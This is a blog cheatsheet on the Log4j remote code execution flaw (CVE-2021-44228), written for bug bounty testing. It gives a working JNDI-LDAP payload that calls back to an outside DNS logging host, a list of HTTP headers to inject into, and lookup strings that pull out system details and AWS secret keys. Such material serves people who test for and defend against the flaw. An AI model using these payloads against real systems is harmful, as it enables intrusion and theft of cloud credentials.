Forem

Cover image for Log4j Vulnerability Cheatsheet
Anton
Anton

Posted on

5 2

Log4j Vulnerability Cheatsheet

Description

Java logging library, log4j, has an unauthenticated RCE vulnerability if a user-controlled string is logged. CVE-2021–44228

Affected versions - Apache log4j 2.0-beta9 ≤ 2.14.1

How It Works

Specially crafted payload is injected into Headers, Input Fields, or Query/Body parameters

https://target.com/?test=${jndi:ldap://jv-${sys:java.version}-hn-${hostName}.qwe3er.dnslog.cn/exp}
Enter fullscreen mode Exit fullscreen mode
  1. You can use a service dnslog.cn to create your DNS subdomain for a test. Example: qwe3er.dnslog.cn

  2. Use this subdomain to craft a payload and send it with the request. Check request to DNS service after some time for confirmation of successful callback

  3. You should receive a similar request to DNS service (with Host & Java Version): jv-11.0.13-hn-73a957d15746.qwe3er.dnslog.cn

Test Environments

You can use provided test environments to inspect the behavior of this vulnerability

Challenges & Labs (Rooms)

You can use created challenges, labs (rooms) for practice

How To Identify (Services)

Use these websites to create DNS address (token) for payload

How To Identify (Scanners)

Use these scanners to check if target website is vulnerable

List of Places where Payload can be Injected

Email header, Username, Password, E-mail address, Filename, Query/Body, File content, Document/Image EXIF, or inside of any of these Headers:

Authorization
Cache-Control
Cf-Connecting_ip
Client-Ip
Contact
Cookie
Forwarded-For-Ip
Forwarded-For
Forwarded
If-Modified-Since
Originating-Ip
Referer
True-Client-Ip
User-Agent
X-Api-Version
X-Client-Ip
X-Forwarded-For
X-Leakix
X-Originating-Ip
X-Real-Ip
X-Remote-Addr
X-Remote-Ip
X-Wap-Profile
Authorization: Basic
Authorization: Bearer
Authorization: Oauth
Authorization: Token
Enter fullscreen mode Exit fullscreen mode

What Information can be Extracted

${hostName}
${sys:user.name}
${sys:user.home}
${sys:user.dir}
${sys:java.home}
${sys:java.vendor}
${sys:java.version}
${sys:java.vendor.url}
${sys:java.vm.version}
${sys:java.vm.vendor}
${sys:java.vm.name}
${sys:os.name}
${sys:os.arch}
${sys:os.version}
${env:JAVA_VERSION}
${env:AWS_SECRET_ACCESS_KEY}
${env:AWS_SESSION_TOKEN}
${env:AWS_SHARED_CREDENTIALS_FILE}
${env:AWS_WEB_IDENTITY_TOKEN_FILE}
${env:AWS_PROFILE}
${env:AWS_CONFIG_FILE}
${env:AWS_ACCESS_KEY_ID}
Enter fullscreen mode Exit fullscreen mode

Video Edition is available on

Static Version Shared On


That's all for now

  1. Share the word about this article
  2. Follow me @therceman

I tweet & write about Bug Bounty Hunting
Cheers, Happy Hunting 👍

Image of Timescale

🚀 pgai Vectorizer: SQLAlchemy and LiteLLM Make Vector Search Simple

We built pgai Vectorizer to simplify embedding management for AI applications—without needing a separate database or complex infrastructure. Since launch, developers have created over 3,000 vectorizers on Timescale Cloud, with many more self-hosted.

Read full post →

Top comments (0)

Billboard image

The Next Generation Developer Platform

Coherence is the first Platform-as-a-Service you can control. Unlike "black-box" platforms that are opinionated about the infra you can deploy, Coherence is powered by CNC, the open-source IaC framework, which offers limitless customization.

Learn more

👋 Kindness is contagious

Engage with a sea of insights in this enlightening article, highly esteemed within the encouraging DEV Community. Programmers of every skill level are invited to participate and enrich our shared knowledge.

A simple "thank you" can uplift someone's spirits. Express your appreciation in the comments section!

On DEV, sharing knowledge smooths our journey and strengthens our community bonds. Found this useful? A brief thank you to the author can mean a lot.

Okay